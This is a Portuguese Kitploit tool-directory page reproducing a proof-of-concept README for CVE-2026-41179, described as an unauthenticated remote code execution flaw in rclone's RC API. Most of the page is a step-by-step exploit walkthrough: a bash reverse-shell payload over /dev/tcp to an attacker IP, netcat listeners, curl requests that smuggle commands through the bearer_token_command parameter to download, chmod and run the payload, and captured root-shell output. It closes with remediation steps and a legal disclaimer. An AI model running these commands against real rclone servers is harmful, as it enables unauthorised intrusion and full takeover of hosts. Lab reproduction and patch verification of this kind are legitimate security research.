Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41179 — PoC para CVE-2026-41179 | Kitploit
Ferramentas/GitHubGitHub/pssec-io/cve-2026-41179
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática
GitHubpssec-io/cve-2026-41179

CVE-2026-41179

PoC para CVE-2026-41179

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41179 — RCE não autenticada na API RC do rclone

⚠️ APENAS PARA FINS EDUCACIONAIS Este repositório destina-se estritamente a pesquisa de segurança, educação e ambientes de laboratório autorizados. A PSSec e os contribuidores deste repositório não aprovam, apoiam nem assumem qualquer responsabilidade por qualquer uso não autorizado, ilegal ou malicioso das informações, código ou técnicas aqui contidas. Ao usar este repositório, você concorda que é o único responsável por suas ações e que testará apenas sistemas que possui ou para os quais tenha permissão explícita por escrito.


Visão Geral

CVE-2026-41179 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) não autenticada na API de Controle Remoto (RC) incorporada do rclone, afetando as versões 1.48.0 a 1.73.4.

Baixar ferramenta
DetalheValor
CVECVE-2026-41179
Pontuação CVSS9.8 (Crítico)
Versões Afetadasrclone 1.48.0 – 1.73.4
Versão Corrigidarclone 1.73.5
ComponenteAPI RC (endpoint /operations/fsinfo)
Vetor de AtaqueRede — nenhuma autenticação necessária

Como Funciona

O rclone vem com uma interface de controle remoto HTTP integrada (rcd). O endpoint /operations/fsinfo aceita uma string fs= fornecida pelo usuário que é analisada e usada para instanciar um backend — incluindo o backend WebDAV. O backend WebDAV suporta um parâmetro bearer_token_command, que é passado diretamente para exec.Command() sem sanitização. Como nenhuma autenticação é necessária neste endpoint por padrão, um atacante não autenticado pode desencadear a execução arbitrária de comandos do sistema operacional como o usuário do processo rclone.

Cadeia de ataque em resumo:

root@kitploit:~
POST /operations/fsinfo (no auth)
  → rc.GetFs() parses attacker-controlled fs= string
    → WebDAV backend instantiated with attacker params
      → bearer_token_command extracted
        → exec.Command() fires OS command
          → RCE as rclone process user

Estrutura do Repositório

root@kitploit:~
CVE-2026-41179/
├── Dockerfile.rclone          # Vulnerable rclone image (v1.69.3)
├── patched.Dockerfile.rclone  # Patched rclone image (v1.73.5)
├── poc.sh                     # Reverse shell payload
└── instructions               # Step-by-step lab walkthrough

Configuração do Laboratório e Exploração (Passo a Passo)

Pré-requisitos

  • Docker
  • Um listener: penelope ou netcat
  • Python 3 (para servir o payload)

Passo 1 — Construir a Imagem Docker Vulnerável

root@kitploit:~
docker build -t rclone-vuln -f Dockerfile.rclone .

Constrói um contêiner Debian-slim executando rclone v1.69.3 com a API RC exposta na porta 5572.


Passo 2 — Executar o Contêiner Vulnerável

root@kitploit:~
docker run -d --name rclone-vuln -p 5572:5572 rclone-vuln

A API RC agora está acessível sem autenticação em http://127.0.0.1:5572.


Passo 3 — Iniciar Seu Listener

root@kitploit:~
penelope -p 5555
# OR
nc -lvnp 5555

Passo 4 — Configurar o Payload do Reverse Shell

Edite o poc.sh e defina seu IP de atacante e porta de escuta:

root@kitploit:~
#!/bin/bash
bash -i >& /dev/tcp/<attacker-ip>/<listening-port> 0>&1

Passo 5 — Servir o Payload via HTTP

Execute isso a partir do mesmo diretório que poc.sh:

root@kitploit:~
python3 -m http.server 8888

Passo 6 — Baixar o Payload para o Alvo

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/usr/bin/curl -o /tmp/shell.sh http://<attacker-ip>:8888/poc.sh':'

Passo 7 — Tornar o Payload Executável

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/bin/chmod +x /tmp/shell.sh':'

Passo 8 — Executar o Payload

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/tmp/shell.sh':'

Passo 9 — Capturar o Shell

Verifique seu listener — você deve receber um shell root do contêiner:

root@kitploit:~
[+] Got reverse shell from f7697b831050~172.17.0.3-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/script!
whoami
root

Passo 10 — Verificar a Correção

Repita os Passos 1–8 usando a imagem corrigida para confirmar que a vulnerabilidade foi corrigida:

root@kitploit:~
docker build -t rclone-patched -f patched.Dockerfile.rclone .
docker run -d --name rclone-patched -p 5573:5572 rclone-patched

Envie a mesma requisição curl para a porta 5573 — o comando não deve ser executado.


Remediação

  • Atualize o rclone para v1.73.5 ou superior — a autenticação agora é aplicada em todos os endpoints RC por padrão.
  • Se você não puder atualizar imediatamente, inicie o rcd com as flags --rc-user e --rc-pass para exigir credenciais.
  • Restrinja o acesso de rede à porta RC (5572) através de regras de firewall — ela nunca deve ser exposta a redes não confiáveis.
  • Considere usar --rc-no-auth=false (o novo padrão em versões corrigidas) explicitamente em scripts de inicialização.

Aviso Legal

Este repositório é fornecido apenas para fins educacionais e de pesquisa de segurança autorizada. O código de prova de conceito demonstra uma vulnerabilidade real em um ambiente de laboratório Docker controlado.

PSSec e todos os contribuidores:

  • Não autorizam ou incentivam a exploração de sistemas sem permissão explícita por escrito do proprietário do sistema.
  • Não assumem nenhuma responsabilidade por qualquer dano, perda de dados, consequências legais ou uso indevido decorrente do uso deste material.
  • Recomendam que todos os testes sejam realizados apenas em ambientes de laboratório isolados que você possua ou para os quais tenha autorização explícita para testar.

O uso não autorizado deste código contra sistemas de produção ou sistemas que você não possui pode violar as leis de fraude informática e crimes cibernéticos em sua jurisdição.


CVE-2026-41179 — Pesquisa por PSSec